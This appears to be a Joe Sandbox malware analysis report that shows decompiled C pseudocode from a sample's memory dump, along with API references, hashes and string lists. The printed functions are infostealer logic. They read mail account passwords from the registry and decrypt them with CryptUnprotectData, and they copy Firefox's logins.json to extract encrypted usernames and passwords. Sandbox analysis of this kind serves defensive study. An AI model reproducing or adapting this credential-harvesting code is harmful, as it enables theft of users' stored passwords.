                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: c0a687fc0ce93e3d17b72830b83dc365c5037e3d52d7af9103c6ae3d016df052
                                      • Instruction ID: 23793b1f467348edbb10cdd720d0e865ae2d3a4006315f596f2e8ad12e4bcb1a
                                      • Opcode Fuzzy Hash: c0a687fc0ce93e3d17b72830b83dc365c5037e3d52d7af9103c6ae3d016df052
                                      • Instruction Fuzzy Hash: 43B0927435070057EE2CDB209D5AF2A22107B80B05FA1569CB212DA1D19AA9E4029A08
                                      Uniqueness

                                      Uniqueness Score: 0.02%

                                      Function 00435A3C, Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00435A3C(long __ecx) {
				void* _t1;

				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
				return _t1;
			}




                                      0x00435a46
                                      0x00435a4c

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,0043347F,?,?,?,0043F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00435A46
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: dcbeedaaa040acec354428e818f4b5d1b8506a3ec3496fc11baaae7e16b5646b
                                      • Instruction ID: 53aff4b3f69a05535d5509f380532bd93da84c80809f944211d28360f8aec016
                                      • Opcode Fuzzy Hash: dcbeedaaa040acec354428e818f4b5d1b8506a3ec3496fc11baaae7e16b5646b
                                      • Instruction Fuzzy Hash: FCA002B47E5300BAFD6957509E1FF157A189741F17F510154B705AC0D055E03581852D
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 00435A2D, Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00435A2D(void* __ecx) {
				int _t1;

				_t1 = VirtualFree(__ecx, 0, 0x8000); // executed
				return _t1;
			}




                                      0x00435a35
                                      0x00435a3b

                                      APIs
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 40684cbbaa54f2643597d9000c708649fea3de3720d5000d000c35410c90259e
                                      • Instruction ID: 7a3b98a7f5e52f308c5a5c3db5597314b84a5ff7998d61d7e201427c0aa9c129
                                      • Opcode Fuzzy Hash: 40684cbbaa54f2643597d9000c708649fea3de3720d5000d000c35410c90259e
                                      • Instruction Fuzzy Hash: 8CA0027469070067ED7457205E0EF0626147741B01F6046947351A80E049E5A0448A1D
                                      Uniqueness

                                      Uniqueness Score: 0.02%

                                      Non-executed Functions

                                      Function 00CD85EF, Relevance: 75.5, Strings: 60, Instructions: 527UNIQUE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: g_2660$g_2660$g_2660$g_2660$g_2660$g_2762$g_2762$g_2762$g_2762$g_2762$g_2863$g_2863$g_2863$g_2863$g_2863$g_3376$g_3376$g_3376$g_3376$g_3376$g_3433$g_3433$g_3433$g_3433$g_3433$g_3435$g_3435$g_3435$g_3435$g_3435$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3553$g_3553$g_3553$g_3553$g_3553
                                      • API String ID: 0-2865011727
                                      • Opcode ID: 1989d2e3ff336b230e8dcee5827cf910abb69da4b83b30888e100f2aa1a27ac5
                                      • Instruction ID: 2eb0dd8ef23874f4a6f5dfb507aadd863753cc852ceb9e82576648f662c73755
                                      • Opcode Fuzzy Hash: 1989d2e3ff336b230e8dcee5827cf910abb69da4b83b30888e100f2aa1a27ac5
                                      • Instruction Fuzzy Hash: 6BE16EFAA503417EFB0173699C03F3E316DD383B54F584948BA24AA3D3E5B6E9245278
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00CDD860, Relevance: 51.9, Strings: 40, Instructions: 1906UNIQUE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2o>H$2o>H$2o>H$2o>H$2o>H$B|_5$B|_5$B|_5$B|_5$B|_5$B|_5$Ku~$Ku~$Ku~$Ku~$Ku~$Ku~$Y$_6+*$ffUb$ffUb$i}J$i}J$i}J$qjf$qjf$qjf$qzv$vyvl$vyvl$vyvl$vyvl$wA,$wA,$wA,$x)1$x)1$x)1$x)1$x)1
                                      • API String ID: 0-3393124289
                                      • Opcode ID: 2a9409f720210f043a63ead169cffb4b68203e7b4eb8d126bf39d522b095b642
                                      • Instruction ID: 3be18c0e2f16ba75327398171e9e1e6221e4b3497e0bc7a6175eddaa9a75dbef
                                      • Opcode Fuzzy Hash: 2a9409f720210f043a63ead169cffb4b68203e7b4eb8d126bf39d522b095b642
                                      • Instruction Fuzzy Hash: 6C53D2B08057A98BDB70CF55CD887DDBBB1BB41328F2082D9D1696A391C7B61AC5CF81
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00438F40, Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 296registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 98%
                                      			E00438F40(void* __ecx, void* __edx, void* __eflags, void* _a4) {
				int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v292;
				char _v556;
				char _v820;
				char _v9012;
				char _v17204;
				long _t124;
				long _t130;
				long _t136;
				long _t142;
				void* _t180;
				void* _t181;
				void* _t199;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t217;

				_t199 = __edx;
				_t181 = __ecx;
				E00431130(0x4334, __ecx);
				_v8 = 0x1000;
				_v24 = 0;
				_v20 = 0;
				_t180 = _t181;
				_v16 = 0;
				E00431052( &_v292, 0, 0x104);
				E00431052( &_v556, 0, 0x104);
				E00431052( &_v820, 0, 0x104);
				E00431052( &_v9012, 0, _v8);
				_t207 = _a4;
				_t209 = _t208 + 0x30;
				if(RegQueryValueExW(_t207, L"Account Name", 0, 0,  &_v9012,  &_v8) == 0) {
					E0043312C( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00431052( &_v9012, 0, 0x1000);
				_t210 = _t209 + 0xc;
				if(RegQueryValueExW(_t207, L"Email", 0, 0,  &_v9012,  &_v8) == 0) {
					E0043312C( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00431052( &_v9012, 0, 0x1000);
				_t211 = _t210 + 0xc;
				if(RegQueryValueExW(_t207, L"POP3 Server", 0, 0,  &_v9012,  &_v8) == 0) {
					E0043312C( &_v24, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00431052( &_v9012, 0, 0x1000);
				_t212 = _t211 + 0xc;
				if(RegQueryValueExW(_t207, L"POP3 User", 0, 0,  &_v9012,  &_v8) == 0) {
					E0043312C( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00431052( &_v9012, 0, 0x1000);
				_t213 = _t212 + 0xc;
				if(RegQueryValueExW(_t207, L"SMTP Server", 0, 0,  &_v9012,  &_v8) == 0) {
					E0043312C( &_v24, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00431052( &_v9012, 0, 0x1000);
				_t214 = _t213 + 0xc;
				_t124 = RegQueryValueExW(_t207, L"POP3 Password", 0, 0,  &_v9012,  &_v8);
				_t225 = _t124;
				if(_t124 == 0) {
					E00431052( &_v17204, _t124, 0x1000);
					E004392D8( &_v9012,  &_v17204, _t225, _v8);
					_t214 = _t214 + 0x10;
					E0043312C( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00431052( &_v9012, 0, 0x1000);
				_t215 = _t214 + 0xc;
				_t130 = RegQueryValueExW(_t207, L"SMTP Password", 0, 0,  &_v9012,  &_v8);
				_t226 = _t130;
				if(_t130 == 0) {
					E00431052( &_v17204, _t130, 0x1000);
					E004392D8( &_v9012,  &_v17204, _t226, _v8);
					_t215 = _t215 + 0x10;
					E0043312C( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00431052( &_v9012, 0, 0x1000);
				_t216 = _t215 + 0xc;
				_t136 = RegQueryValueExW(_t207, L"HTTP Password", 0, 0,  &_v9012,  &_v8);
				_t227 = _t136;
				if(_t136 == 0) {
					E00431052( &_v17204, _t136, 0x1000);
					E004392D8( &_v9012,  &_v17204, _t227, _v8);
					_t216 = _t216 + 0x10;
					E0043312C( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00431052( &_v9012, 0, 0x1000);
				_t217 = _t216 + 0xc;
				_t142 = RegQueryValueExW(_t207, L"IMAP Password", 0, 0,  &_v9012,  &_v8);
				_t228 = _t142;
				if(_t142 == 0) {
					E00431052( &_v17204, _t142, 0x1000);
					E004392D8( &_v9012,  &_v17204, _t228, _v8);
					_t217 = _t217 + 0x10;
					E0043312C( &_v16,  &_v17204,  &_v17204);
				}
				_v12 = 3;
				if(E0043308E( &_v24) > 0) {
					E00431EB9(_t217 - 0x10,  &_v24);
					E00431EEF(_t180);
				}
				E0043138F( &_v24);
				return 1;
			}































                                      0x00438f40
                                      0x00438f40
                                      0x00438f48
                                      0x00438f52
                                      0x00438f5e
                                      0x00438f68
                                      0x00438f6d
                                      0x00438f6f
                                      0x00438f72
                                      0x00438f80
                                      0x00438f8e
                                      0x00438f9e
                                      0x00438fa3
                                      0x00438fa9
                                      0x00438fc6
                                      0x00438fd2
                                      0x00438fd2
                                      0x00438fe2
                                      0x00438fec
                                      0x00438ff1
                                      0x0043900d
                                      0x00439019
                                      0x00439019
                                      0x00439024
                                      0x00439030
                                      0x00439035
                                      0x00439051
                                      0x0043905d
                                      0x0043905d
                                      0x00439068
                                      0x00439074
                                      0x00439079
                                      0x00439095
                                      0x004390a1
                                      0x004390a1
                                      0x004390ac
                                      0x004390b8
                                      0x004390bd
                                      0x004390d9
                                      0x004390e5
                                      0x004390e5
                                      0x004390f0
                                      0x004390fc
                                      0x00439101
                                      0x00439119
                                      0x0043911b
                                      0x0043911d
                                      0x0043912c
                                      0x00439140
                                      0x00439145
                                      0x00439152
                                      0x00439152
                                      0x0043915d
                                      0x00439169
                                      0x0043916e
                                      0x00439186
                                      0x00439188
                                      0x0043918a
                                      0x00439199
                                      0x004391ad
                                      0x004391b2
                                      0x004391bf
                                      0x004391bf
                                      0x004391ca
                                      0x004391d6
                                      0x004391db
                                      0x004391f3
                                      0x004391f5
                                      0x004391f7
                                      0x00439206
                                      0x0043921a
                                      0x0043921f
                                      0x0043922c
                                      0x0043922c
                                      0x00439237
                                      0x00439243
                                      0x00439248
                                      0x00439260
                                      0x00439262
                                      0x00439264
                                      0x00439273
                                      0x00439287
                                      0x0043928c
                                      0x00439299
                                      0x00439299
                                      0x004392a1
                                      0x004392af
                                      0x004392ba
                                      0x004392c1
                                      0x004392c1
                                      0x004392c9
                                      0x004392d5

                                      APIs
                                      • RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000,?,?,?,?,?,75F645DD,757992CF,00000000,?,00438F04), ref: 00438FC2
                                      • RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000,?,?,?,?,?,?,?,?,75F645DD,757992CF), ref: 00439009
                                      • RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 0043904D
                                      • RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 00439091
                                      • RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 004390D5
                                      • RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 00439119
                                      • RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 00439186
                                      • RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 004391F3
                                      • RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 00439260
                                        • Part of subcall function 004392D8: GlobalAlloc.KERNEL32(00000040,-00000001,75F645FD,?,?,?,0043928C,00001000,?,00000000,00001000), ref: 004392F6
                                        • Part of subcall function 004392D8: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0043928C), ref: 0043932C
                                        • Part of subcall function 004392D8: lstrcpyW.KERNEL32(?,Could not decrypt), ref: 00439363
                                        • Part of subcall function 0043308E: lstrlenW.KERNEL32(?,00433473,?,?,?,0043F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00433095
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
                                      • String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
                                      • API String ID: 6593746-2537589853
                                      • Opcode ID: 09eda6f71a2da7260302307d298def3de56931df9adf4367ad310fa3514513b9
                                      • Instruction ID: 340108873a9cc4f14c79cdb5aa310cc7283e2807fbc6629d46fe75d5bc771e07
                                      • Opcode Fuzzy Hash: 09eda6f71a2da7260302307d298def3de56931df9adf4367ad310fa3514513b9
                                      • Instruction Fuzzy Hash: 4BA121B291011DBADF25EAA1CD45FDF737CAF18744F1011AAF605F2184E6B8AB448F68
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 004398B0, Relevance: 28.4, APIs: 5, Strings: 11, Instructions: 406filestringUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 95%
                                      			E004398B0(intOrPtr __ecx, void* __eflags, char _a4) {
				int _v12;
				int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				intOrPtr _v32;
				WCHAR* _v36;
				char _v40;
				char _v44;
				int _v48;
				int _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				long _v92;
				int _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				void* _v116;
				int _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				int _v156;
				char _v160;
				intOrPtr _v164;
				char _v180;
				char _v184;
				short _v704;
				short _v1224;
				char* _t165;
				void* _t167;
				int _t189;
				int _t190;
				int _t193;
				int _t207;
				WCHAR* _t215;
				void* _t217;
				int _t221;
				void* _t230;
				void* _t236;
				void* _t242;
				int _t281;
				int _t283;
				char* _t293;
				char* _t325;
				void* _t386;
				long _t389;
				intOrPtr _t391;
				intOrPtr _t392;
				WCHAR* _t393;
				int _t394;
				void* _t395;
				void* _t396;
				void* _t397;

				_t397 = __eflags;
				_t392 = __ecx;
				_v32 = __ecx;
				E00433412( &_v24, L"Profile");
				_t281 = 0;
				E00431052( &_v1224, 0, 0x208);
				_t396 = _t395 + 0xc;
				_v92 = 0;
				_t389 = 0;
				E00431052( &_v704, 0, 0x104);
				_t385 =  &_v704;
				if(E0043ADBE(L"firefox.exe",  &_v704, _t397) != 0) {
					_t293 =  &_v44;
					E00433412(_t293,  &_v704);
					lstrcatW( &_v704, L"\\firefox.exe");
					GetBinaryTypeW( &_v704,  &_v92);
					_t399 = _v92 - 6;
					_t165 =  &_v44;
					if(_v92 != 6) {
						_push(0);
					} else {
						_push(1);
					}
					_push(_t293);
					E0043345A(_t396, _t165);
					_t167 = E0043A6A6(_t392, _t385, _t399);
					_t400 = _t167;
					if(_t167 != 0) {
						E00433297( &_a4, _t385, _t400, L"\\Mozilla\\Firefox\\");
						E0043345A( &_v36,  &_a4);
						E00433297( &_v36, _t385, _t400, L"profiles.ini");
						E00433264( &_v24, E00433412( &_v40, L"Profile"));
						E00435A2D(_v40);
						E0043309F( &_v24, _t385, _t400, _t281);
						while(GetPrivateProfileStringW(_v24, L"Path", _t281,  &_v1224, 0x104, _v36) != 0) {
							_t389 = _t389 + 1;
							_v40 = _t389;
							E00433264( &_v24, E00433412( &_v96, L"Profile"));
							E00435A2D(_v96);
							_v96 = _t281;
							E0043309F( &_v24, _t385, __eflags, _t389);
							E0043345A( &_v12,  &_a4);
							E00433297( &_v12, _t385, __eflags,  &_v1224);
							E00433381( &_v12,  &_v28);
							_t189 =  *((intOrPtr*)(_t392 + 0x68))(_v28);
							__eflags = _t189;
							if(_t189 == 0) {
								_t190 =  *((intOrPtr*)(_t392 + 0x80))();
								_v156 = _t190;
								__eflags = _t190;
								if(_t190 == 0) {
									goto L7;
								} else {
									_t193 =  *((intOrPtr*)(_t392 + 0x7c))(_t190, 1, _t281);
									_t396 = _t396 + 0xc;
									__eflags = _t193;
									if(_t193 != 0) {
										goto L7;
									} else {
										E0043345A( &_v20,  &_v12);
										E00433297( &_v20, _t385, __eflags, L"\\logins.json");
										_t386 = 0x1a;
										E0043D75B( &_v16, _t386, __eflags);
										E00433297( &_v16, _t386, __eflags, "\\");
										_t385 = 8;
										E00433162( &_v16, __eflags, E004332D4( &_v56, _t385, __eflags));
										E00435A2D(_v56);
										_v56 = _t281;
										E00433297( &_v16, _t385, __eflags, L".tmp");
										_t393 = _v16;
										_t390 = _v20;
										__eflags = CopyFileW(_v20, _t393, _t281);
										if(__eflags != 0) {
											E00433264( &_v20,  &_v16);
											_t390 = _v20;
										}
										E0043DE6C( &_v184, __eflags);
										_t325 =  &_v180;
										E00433264(_t325,  &_v20);
										_push(_t325);
										_t207 = E0043E130( &_v184, 0xc0000000);
										_t327 =  &_v184;
										__eflags = _t207;
										if(__eflags != 0) {
											_v52 = _t281;
											_v48 = _t281;
											E0043DDDB( &_v184, _t385,  &_v52, _v164, _t281);
											_t215 = E004331EC( &_v116, "encryptedUsername");
											_t217 = E00432D59( &_v52,  &_v160);
											_t385 = _t215;
											_t283 = E00438B5D(_t217, _t215, __eflags);
											_v120 = _t283;
											E00435A2D(_v160);
											_t336 = _v116;
											E00435A2D(_v116);
											__eflags = _t283;
											if(_t283 == 0) {
												_t281 = 0;
												__eflags = 0;
											} else {
												_t391 = _v32;
												_t281 = 0;
												__eflags = 0;
												_t394 = _v120;
												do {
													_v112 = 0;
													_v108 = 0;
													_v104 = 0;
													_t230 = E004331EC( &_v128, "hostname");
													E00438B96( &_v88, E00432D59( &_v52,  &_v124), __eflags, _t230, _t394);
													E00435A2D(_v124);
													E00435A2D(_v128);
													_t236 = E004331EC( &_v136, "encryptedUsername");
													E00438B96( &_v84, E00432D59( &_v52,  &_v132), __eflags, _t236, _t394);
													E00435A2D(_v132);
													E00435A2D(_v136);
													_t242 = E004331EC( &_v144, "encryptedPassword");
													_t385 = E00432D59( &_v52,  &_v140);
													E00438B96( &_v80, _t244, __eflags, _t242, _t394);
													E00435A2D(_v140);
													E00435A2D(_v144);
													E00439E04(_t391, __eflags, _v84,  &_v72);
													E00439E04(_t391, __eflags, _v80,  &_v76);
													E00433264( &_v112, E00432ECA( &_v88, __eflags,  &_v60));
													E00435A2D(_v60);
													_v60 = 0;
													E00433264( &_v108, E00432ECA(E004331EC( &_v148, _v72), __eflags,  &_v64));
													E00435A2D(_v64);
													_v64 = 0;
													E00435A2D(_v148);
													E00433264( &_v104, E00432ECA(E004331EC( &_v152, _v76), __eflags,  &_v68));
													E00435A2D(_v68);
													_v68 = 0;
													E00435A2D(_v152);
													_t396 = _t396 - 0x10;
													_v100 = 0;
													E00431EB9(_t396,  &_v112);
													E00431EEF(_t391);
													E00435A2D(_v72);
													E00435A2D(_v76);
													E00435A2D(_v80);
													E00435A2D(_v84);
													E00435A2D(_v88);
													_t336 =  &_v112;
													E0043138F( &_v112);
													_t394 = _t394 - 1;
													__eflags = _t394;
												} while (_t394 != 0);
												_t393 = _v16;
												_t390 = _v20;
											}
											_t221 = PathFileExistsW(_t393);
											__eflags = _t221;
											if(_t221 != 0) {
												E0043345A(_t396,  &_v16);
												E0043DEA9(_t336);
											}
											 *((intOrPtr*)(_v32 + 0x84))(_v156);
											 *((intOrPtr*)(_v32 + 0x6c))();
											E00432E66( &_v52);
											_t327 =  &_v184;
										}
										E0043DE8B(_t327, __eflags);
										E00435A2D(_t393);
										_v16 = _t281;
										E00435A2D(_t390);
										_v20 = _t281;
										E00435A2D(_v28);
										E00435A2D(_v12);
										_t389 = _v40;
										_t392 = _v32;
									}
								}
							} else {
								L7:
								E00435A2D(_v28);
								E00435A2D(_v12);
							}
							_v12 = _t281;
						}
						E0043A64F(_t392);
						_t281 = 1;
						E00435A2D(_v36);
					}
					E00435A2D(_v44);
				}
				E00435A2D(_v24);
				E00435A2D(_a4);
				return _t281;
			}







































































                                      0x004398b0
                                      0x004398bc
                                      0x004398c6
                                      0x004398c9
                                      0x004398d3
                                      0x004398dd
                                      0x004398e2
                                      0x004398e5
                                      0x004398ee
                                      0x004398f7
                                      0x004398fe
                                      0x00439911
                                      0x0043991e
                                      0x00439921
                                      0x00439932
                                      0x00439943
                                      0x00439949
                                      0x0043994d
                                      0x00439950
                                      0x004399be
                                      0x00439952
                                      0x00439952
                                      0x00439952
                                      0x00439954
                                      0x00439958
                                      0x0043995f
                                      0x00439964
                                      0x00439966
                                      0x00439974
                                      0x00439980
                                      0x0043998d
                                      0x004399a3
                                      0x004399ab
                                      0x004399b4
                                      0x00439dab
                                      0x004399c1
                                      0x004399ca
                                      0x004399d6
                                      0x004399de
                                      0x004399e7
                                      0x004399ea
                                      0x004399f6
                                      0x00439a05
                                      0x00439a11
                                      0x00439a19
                                      0x00439a1d
                                      0x00439a1f
                                      0x00439a36
                                      0x00439a3c
                                      0x00439a42
                                      0x00439a44
                                      0x00000000
                                      0x00439a46
                                      0x00439a4a
                                      0x00439a4d
                                      0x00439a50
                                      0x00439a52
                                      0x00000000
                                      0x00439a54
                                      0x00439a5b
                                      0x00439a68
                                      0x00439a6f
                                      0x00439a73
                                      0x00439a80
                                      0x00439a87
                                      0x00439a94
                                      0x00439a9c
                                      0x00439aa9
                                      0x00439aac
                                      0x00439ab1
                                      0x00439ab4
                                      0x00439ac0
                                      0x00439ac2
                                      0x00439acb
                                      0x00439ad0
                                      0x00439ad0
                                      0x00439ad9
                                      0x00439ae2
                                      0x00439ae8
                                      0x00439aed
                                      0x00439af9
                                      0x00439afe
                                      0x00439b04
                                      0x00439b06
                                      0x00439b16
                                      0x00439b1a
                                      0x00439b1d
                                      0x00439b2a
                                      0x00439b3b
                                      0x00439b40
                                      0x00439b4f
                                      0x00439b51
                                      0x00439b54
                                      0x00439b59
                                      0x00439b5c
                                      0x00439b61
                                      0x00439b63
                                      0x00439d36
                                      0x00439d36
                                      0x00439b69
                                      0x00439b69
                                      0x00439b6c
                                      0x00439b6c
                                      0x00439b6e
                                      0x00439b71
                                      0x00439b7a
                                      0x00439b7d
                                      0x00439b80
                                      0x00439b83
                                      0x00439b9a
                                      0x00439ba4
                                      0x00439bac
                                      0x00439bbd
                                      0x00439bd4
                                      0x00439bde
                                      0x00439be9
                                      0x00439bfa
                                      0x00439c0f
                                      0x00439c14
                                      0x00439c21
                                      0x00439c2c
                                      0x00439c3a
                                      0x00439c48
                                      0x00439c5d
                                      0x00439c65
                                      0x00439c6d
                                      0x00439c8a
                                      0x00439c92
                                      0x00439c9d
                                      0x00439ca0
                                      0x00439cc2
                                      0x00439cca
                                      0x00439cd5
                                      0x00439cd8
                                      0x00439cdd
                                      0x00439ce0
                                      0x00439ce9
                                      0x00439cf0
                                      0x00439cf8
                                      0x00439d00
                                      0x00439d08
                                      0x00439d10
                                      0x00439d18
                                      0x00439d1d
                                      0x00439d20
                                      0x00439d25
                                      0x00439d25
                                      0x00439d25
                                      0x00439d2e
                                      0x00439d31
                                      0x00439d31
                                      0x00439d39
                                      0x00439d3f
